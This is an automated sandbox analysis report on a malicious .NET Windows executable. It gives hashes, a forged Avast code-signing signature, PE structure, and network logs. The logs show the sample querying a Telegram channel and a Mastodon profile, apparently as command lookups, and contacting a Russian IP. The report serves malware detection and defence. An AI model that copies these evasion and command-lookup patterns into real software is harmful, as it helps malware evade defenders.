https://climatejustice.social/@ffoleg94 | true | Avira URL Cloud: malware | unknown
https://t.me/korstonsales | false | | high

IP | Domain | Country | ASN | ASN Name | Malicious
45.159.249.4 | unknown | Russian Federation | 44676 | VMAGE-ASRU | false
167.86.107.75 | climatejustice.social | Germany | 51167 | CONTABODE | true
149.154.167.99 | t.me | United Kingdom | 62041 | TELEGRAMRU | false

Joe Sandbox Version: 35.0.0 Citrine
Analysis ID: 679146
Start date and time: 2022-08-05 10:48:11 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 52s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: uGfpJynSWM (renamed file extension from none to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@3/1@2/3
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HDC Information:
                                      • Successful, ratio: 99.8% (good quality ratio 96.3%)
                                      • Quality average: 82.2%
                                      • Quality standard deviation: 28.2%
                                      HCA Information:
                                      • Successful, ratio: 100%
                                      • Number of executed functions: 56
                                      • Number of non-executed functions: 138
                                      Cookbook Comments:
                                      • Adjust boot time
                                      • Enable AMSI
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                      • Excluded IPs from analysis (whitelisted): 23.211.4.86, 23.211.6.115
                                      • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
• Not all processes were analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.

Time | Type | Description
10:49:12 | API Interceptor | 1x Sleep call for process: uGfpJynSWM.exe modified
10:49:38 | API Interceptor | 5x Sleep call for process: cvtres.exe modified
                                                                  No context
                                                                  Process:C:\Users\user\Desktop\uGfpJynSWM.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):226
                                                                  Entropy (8bit):5.3467126928258955
                                                                  Encrypted:false
                                                                  SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2LDY3U21v:Q3La/KDLI4MWuPk21v
                                                                  MD5:DD8B7A943A5D834CEEAB90A6BBBF4781
                                                                  SHA1:2BED8D47DF1C0FF76B40811E5F11298BD2D06389
                                                                  SHA-256:E1D0A304B16BE51AE361E392A678D887AB0B76630B42A12D252EDC0484F0333B
                                                                  SHA-512:24167174EA259CAF57F65B9B9B9C113DD944FC957DB444C2F66BC656EC2E6565EFE4B4354660A5BE85CE4847434B3BDD4F7E05A9E9D61F4CC99FF0284DAA1C87
                                                                  Malicious:true
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..
                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Entropy (8bit):7.77740759573974
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:uGfpJynSWM.exe
                                                                  File size:374960
                                                                  MD5:eb84aeef20ea974bf207dd6df8446567
                                                                  SHA1:624a1e8510a1d7f3ff05693c30d724f19aaf5a1a
                                                                  SHA256:9f532c8749bc71b3fc723d42f86300ae5a583515817da2aad40c858f163d01f8
                                                                  SHA512:b2cf0b9aaacfc8e2fd6c517c0e49ff977b44097904cdf84a7d2a8324fc9525d0937442bf433e9a442e46914caf529b3e37d86097a36a761291e13c100aa30d3a
                                                                  SSDEEP:6144:wZJyvX/Kbhi5cqHYUAze34brlMoiGmWMG7u7isZaozdV4vMqmKEVDA:UJyvki3HYeMrlvKG7QiWbV4vMqmKF
                                                                  TLSH:7784F09D3681758FC446FEF59AB01D145620BC6B0717C243E8B73A7C9A3D28BDE811AE
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Z.b..............0..............)... ...@....@.. ..............................BQ....`................................
                                                                  Icon Hash:0f4d494919151b03
                                                                  Entrypoint:0x45298e
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:true
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x62D65AB0 [Tue Jul 19 07:18:08 2022 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                  Signature Valid:false
                                                                  Signature Issuer:CN=DigiCert SHA2 Assured ID Code Signing CA, OU=www.digicert.com, O=DigiCert Inc, C=US
                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                  Error Number:-2146869232
                                                                  Not Before:4/1/2020 5:00:00 PM
                                                                  Not After:3/9/2023 4:00:00 AM
                                                                  Subject Chain
                                                                  • CN=Avast Software s.r.o., OU=RE stapler cistodc, O=Avast Software s.r.o., L=Praha, C=CZ
                                                                  Version:3
                                                                  Thumbprint MD5:58F27306512AAEE9028766C21733D912
                                                                  Thumbprint SHA-1:DB4336A6DC808C8F6A4944FA8E8D6A9E703F8915
                                                                  Thumbprint SHA-256:C2DCD22E0E7CB9619DF76810B301291CF07A18DF244C05D059A8BA2137E34CFE
                                                                  Serial:0970EF4BAD5CC44A1C2BC3D96401674C
                                                                  Instruction
                                                                  jmp dword ptr [00402000h]
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x52940          0x4b          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x54000          0x848e        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x59400          0x24b0        .rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x5e000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x528ec          0x1c          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
.text   0x2000           0x50994       0x50a00   False     0.9173994670542636  data       7.888541504684198    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0x54000          0x848e        0x8600    False     0.285185401119403   data       5.202876902230195    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x5e000          0xc           0x200     False     0.044921875         data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name           RVA      Size    Type                                                                                                                     Language  Country
RT_ICON        0x541d8  0x468   GLS_BINARY_LSB_FIRST
RT_ICON        0x54640  0x10a8  data
RT_ICON        0x556e8  0x25a8  data
RT_ICON        0x57c90  0x4228  dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 0, next used block 0
RT_GROUP_ICON  0x5beb8  0x3e    data
RT_VERSION     0x5bef8  0x3ac   data
RT_MANIFEST    0x5c2a4  0x1ea   XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
DLL          Import
mscoree.dll  _CorExeMain
Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                  Aug 5, 2022 10:50:22.857456923 CEST44349802167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:22.857494116 CEST44349802167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:22.859236002 CEST49802443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:22.859266043 CEST44349802167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:22.859282017 CEST44349802167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:22.859389067 CEST49802443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:22.861351967 CEST49802443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:22.861370087 CEST44349802167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:22.876609087 CEST4980480192.168.2.745.159.249.4
                                                                  Aug 5, 2022 10:50:25.982403994 CEST4980480192.168.2.745.159.249.4
                                                                  Aug 5, 2022 10:50:31.998555899 CEST4980480192.168.2.745.159.249.4
                                                                  Aug 5, 2022 10:50:44.119946957 CEST49854443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:50:44.119992018 CEST44349854149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:50:44.120143890 CEST49854443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:50:44.120920897 CEST49854443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:50:44.120933056 CEST44349854149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:50:44.176810980 CEST44349854149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:50:44.176940918 CEST49854443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:50:44.177670002 CEST49854443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:50:44.177689075 CEST44349854149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:50:44.197926044 CEST49854443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:50:44.197945118 CEST44349854149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:50:44.244199038 CEST44349854149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:50:44.244241953 CEST44349854149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:50:44.244283915 CEST44349854149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:50:44.244322062 CEST49854443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:50:44.244355917 CEST44349854149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:50:44.244373083 CEST49854443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:50:44.244379997 CEST44349854149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:50:44.244432926 CEST49854443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:50:44.244473934 CEST49854443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:50:44.244761944 CEST49854443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:50:44.244791985 CEST44349854149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:50:44.273916960 CEST49855443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:44.273956060 CEST44349855167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:44.274086952 CEST49855443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:44.286598921 CEST49855443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:44.286621094 CEST44349855167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:44.334139109 CEST44349855167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:44.336725950 CEST49855443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:44.337399006 CEST49855443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:44.337408066 CEST44349855167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:44.349813938 CEST49855443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:44.349834919 CEST44349855167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:44.463104010 CEST44349855167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:44.463155031 CEST44349855167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:44.463193893 CEST44349855167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:44.463303089 CEST49855443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:44.463330984 CEST44349855167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:44.463371992 CEST44349855167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:44.463383913 CEST49855443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:44.463409901 CEST49855443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:44.463452101 CEST49855443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:44.463455915 CEST44349855167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:44.463490009 CEST49855443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:44.463535070 CEST44349855167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:44.464889050 CEST49855443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:44.468607903 CEST49855443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:44.468637943 CEST44349855167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:44.493881941 CEST4985680192.168.2.745.159.249.4
                                                                  Aug 5, 2022 10:50:47.499902010 CEST4985680192.168.2.745.159.249.4
                                                                  Aug 5, 2022 10:50:53.516074896 CEST4985680192.168.2.745.159.249.4
                                                                  Aug 5, 2022 10:51:05.645737886 CEST49883443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:51:05.645791054 CEST44349883149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:51:05.645893097 CEST49883443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:51:05.646495104 CEST49883443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:51:05.646507025 CEST44349883149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:51:05.702419043 CEST44349883149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:51:05.707700014 CEST49883443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:51:05.708374023 CEST49883443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:51:05.708384991 CEST44349883149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:51:05.713063955 CEST49883443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:51:05.713073969 CEST44349883149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:51:05.776869059 CEST44349883149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:51:05.776925087 CEST44349883149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:51:05.776971102 CEST44349883149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:51:05.777228117 CEST44349883149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:51:05.777987003 CEST49883443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:51:05.778371096 CEST49883443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:51:05.778393030 CEST44349883149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:51:05.799880028 CEST49884443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:51:05.799920082 CEST44349884167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:51:05.800045013 CEST49884443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:51:05.800621986 CEST49884443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:51:05.800642967 CEST44349884167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:51:05.844991922 CEST44349884167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:51:05.859198093 CEST49884443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:51:05.865519047 CEST49884443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:51:05.865540028 CEST44349884167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:51:05.871738911 CEST49884443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:51:05.871756077 CEST44349884167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:51:05.977401972 CEST44349884167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:51:05.977436066 CEST44349884167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:51:05.977457047 CEST44349884167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:51:05.977559090 CEST49884443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:51:05.977579117 CEST44349884167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:51:05.977623940 CEST49884443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:51:05.977632046 CEST44349884167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:51:05.977642059 CEST49884443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:51:05.977696896 CEST49884443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:51:05.978152990 CEST49884443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:51:05.978167057 CEST44349884167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:51:06.006800890 CEST4988680192.168.2.745.159.249.4
                                                                  Aug 5, 2022 10:51:09.017041922 CEST4988680192.168.2.745.159.249.4
                                                                  Aug 5, 2022 10:51:15.017640114 CEST4988680192.168.2.745.159.249.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 5, 2022 10:49:17.122176886 CEST | 60335 | 53 | 192.168.2.7 | 8.8.8.8
Aug 5, 2022 10:49:17.141352892 CEST | 53 | 60335 | 8.8.8.8 | 192.168.2.7
Aug 5, 2022 10:49:17.786555052 CEST | 60978 | 53 | 192.168.2.7 | 8.8.8.8
Aug 5, 2022 10:49:17.805754900 CEST | 53 | 60978 | 8.8.8.8 | 192.168.2.7

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Aug 5, 2022 10:49:17.122176886 CEST | 192.168.2.7 | 8.8.8.8 | 0xc715 | Standard query (0) | t.me | A (IP address) | IN (0x0001)
Aug 5, 2022 10:49:17.786555052 CEST | 192.168.2.7 | 8.8.8.8 | 0xd64a | Standard query (0) | climatejustice.social | A (IP address) | IN (0x0001)

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Aug 5, 2022 10:49:17.141352892 CEST | 8.8.8.8 | 192.168.2.7 | 0xc715 | No error (0) | t.me | | 149.154.167.99 | A (IP address) | IN (0x0001)
Aug 5, 2022 10:49:17.805754900 CEST | 8.8.8.8 | 192.168.2.7 | 0xd64a | No error (0) | climatejustice.social | | 167.86.107.75 | A (IP address) | IN (0x0001)
                                                                  • t.me
                                                                  • climatejustice.social
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.7 | 49765 | 149.154.167.99 | 443 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp | kBytes transferred | Direction | Data
2022-08-05 08:49:17 UTC | 0 | OUT | GET /korstonsales HTTP/1.1
                                                                  Host: t.me
2022-08-05 08:49:17 UTC | 0 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 05 Aug 2022 08:49:17 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Content-Length: 9635
                                                                  Connection: close
                                                                  Set-Cookie: stel_ssid=81a92d177cf1bdddf7_18201360474548186560; expires=Sat, 06 Aug 2022 08:49:17 GMT; path=/; samesite=None; secure; HttpOnly
                                                                  Pragma: no-cache
                                                                  Cache-control: no-store
                                                                  X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                  Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                  Strict-Transport-Security: max-age=35768000
2022-08-05 08:49:17 UTC | 0 | IN | Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @korstonsales</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.7 | 49766 | 167.86.107.75 | 443 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp | kBytes transferred | Direction | Data
2022-08-05 08:49:17 UTC | 9 | OUT | GET /@ffoleg94 HTTP/1.1
                                                                  Host: climatejustice.social
2022-08-05 08:49:17 UTC | 10 | IN | HTTP/1.1 200 OK
                                                                  Date: Fri, 05 Aug 2022 08:49:17 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Server: Mastodon
                                                                  X-Frame-Options: DENY
                                                                  X-Content-Type-Options: nosniff
                                                                  X-XSS-Protection: 0
                                                                  Permissions-Policy: interest-cohort=()
                                                                  Link: <https://climatejustice.social/.well-known/webfinger?resource=acct%3Affoleg94%40climatejustice.social>; rel="lrdd"; type="application/jrd+json", <https://climatejustice.social/users/ffoleg94>; rel="alternate"; type="application/activity+json"
                                                                  Vary: Accept, Accept-Encoding, Origin
                                                                  Cache-Control: max-age=0, public
                                                                  ETag: W/"35467f9a4afaaea4d698d19476026f40"
                                                                  Content-Security-Policy: base-uri 'none'; default-src 'none'; frame-ancestors 'none'; font-src 'self' https://climatejustice.social; img-src 'self' https: data: blob: https://climatejustice.social; style-src 'self' https://climatejustice.social 'nonce-sOykySI0/v+BFinQ5Zv2HQ=='; media-src 'self' https: data: https://climatejustice.social; frame-src 'self' https:; manifest-src 'self' https://climatejustice.social; connect-src 'self' data: blob: https://climatejustice.social https://climatejustice.social wss://climatejustice.social; script-src 'self' https://climatejustice.social; child-src 'self' blob: https://climatejustice.social; worker-src 'self' blob: https://climatejustice.social
                                                                  Set-Cookie: _mastodon_session=IE12lf0Aiww%2FO2SHgNYf6X8ktxvGiUwFuvpakzTKg55PVj3wQxbOx8QbPNu%2BbA1ljKtplQtfpHSjetQM3MX253iMB2kbLm3xNEhgwBeB%2F1eCW8Wg13ePrm5lWBQfL9FAO02eO7J9l3dW3s6HTqeP4cis2esq7DldbRI0JLHXWe51XjtZNzvE6RX%2BUXAkx0ez6ASRzCFL8XG1b53DHaPoYf9LXuHN45UIQQKGgtGvY8K1mMZsTqoEdXlHxIHPmSknkSeuS38vHUAtiNgsrwJoiv1FJ7nyRHySt6rMdHZwhHdc3ptf6PDZ0wBxvwMpVHuFlqdHAXbX%2FUb%2Bmlizb1luBXM%3D--UaPP34RL8MYYb6Tj--nidR%2BdAjAGmnnhmujvS6WQ%3D%3D; path=/; HttpOnly; SameSite=Lax; secure
                                                                  X-Request-Id: 58ae802f-9e2b-4626-b42d-911de7da7729
                                                                  X-Runtime: 0.054172
                                                                  Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                                  X-Cached: MISS
                                                                  Strict-Transport-Security: max-age=31536000
2022-08-05 08:49:17 UTC | 11 | IN | Data Ascii: 6550<!DOCTYPE html><html lang='en'><head><meta charset='utf-8'><meta content='width=device-width, initial-scale=1' name='viewport'><link href='/favicon.ico' rel='icon' type='image/x-icon'><link href='/apple-touch-icon.png' rel='apple-touch-icon' s
2022-08-05 08:49:17 UTC | 26 | IN | Data Ascii: ">climatejustice.global</a>for climatejustice groups<a href="https://funk.climatejustice.global" target="_blank">funk.climatejustice.global</a>for podcasts and music</span></p></div></div><div class='endorsements-widget trends-widget'><h4 clas


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.7 | 49883 | 149.154.167.99 | 443 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp | kBytes transferred | Direction | Data
2022-08-05 08:51:05 UTC | 188 | OUT | GET /korstonsales HTTP/1.1
                                                                  Host: t.me
                                                                  Cookie: stel_ssid=81a92d177cf1bdddf7_18201360474548186560
2022-08-05 08:51:05 UTC | 188 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 05 Aug 2022 08:51:05 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Content-Length: 9636
                                                                  Connection: close
                                                                  Pragma: no-cache
                                                                  Cache-control: no-store
                                                                  X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                  Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                  Strict-Transport-Security: max-age=35768000
2022-08-05 08:51:05 UTC | 188 | IN | Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @korstonsales</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.7 | 49884 | 167.86.107.75 | 443 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp | kBytes transferred | Direction | Data
2022-08-05 08:51:05 UTC | 197 | OUT | GET /@ffoleg94 HTTP/1.1
                                                                  Host: climatejustice.social
                                                                  Cookie: _mastodon_session=G8wdgwz%2FDemSpy0Da1ZLqVdSh5XC%2FhOntkD9%2FioEKONmGFQbKw3ZbiJ4RIMQvyl5QKxN%2FpcDH0nKadQ0yXDwXyz6yqDcLvbVjYrc1VwLIggpvLXohspOLTi9YyRFkDXD1U6%2Fzrzrb4LoA5rAsIFcowDfc23g9dzpYcSLczI6VlHA0lfP8JjHOwarQxEdzM6akhIz0PxsXrVBHQQArBfIyixEHqMzgVy%2FgvPIRcQ2qdVLKMgTPmDwVbQ0%2BqoNguC6M%2F7xjoKMMQknPlrQIslHVR5u8qBY9lIeeNK373jl%2B82kCofXgGW%2BvK4Vwx2GKefGraC9M1B%2Bz7G9H6WpaKFziTw%3D--Ffkg6BiJ3LNw7A7D--YyCOAf66iro8NmL254gNlw%3D%3D
2022-08-05 08:51:05 UTC | 198 | IN | HTTP/1.1 200 OK
                                                                  Date: Fri, 05 Aug 2022 08:51:05 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Transfer-Encoding: chunked
